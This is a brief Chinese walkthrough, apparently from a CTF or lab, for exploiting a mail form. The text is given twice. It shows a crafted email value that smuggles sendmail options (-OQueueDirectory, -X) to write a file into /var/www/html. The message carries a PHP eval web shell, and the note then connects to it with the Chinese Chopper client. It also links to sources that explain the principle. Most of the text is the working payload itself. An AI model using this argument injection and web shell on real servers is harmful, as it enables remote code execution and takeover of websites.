用bp抓包,发现与后台交互的文件
构建email "aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com
message <?php @eval($_REQUEST[a]);?>
访问a.php文件,上传成功
菜刀无惧链接
原理参考:https://www.anquanke.com/post/id/85295
https://blog.csdn.net/wyvbboy/article/details/53969278
用bp抓包,发现与后台交互的文件
构建email "aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com
message <?php @eval($_REQUEST[a]);?>
访问a.php文件,上传成功
菜刀无惧链接
原理参考:https://www.anquanke.com/post/id/85295
https://blog.csdn.net/wyvbboy/article/details/53969278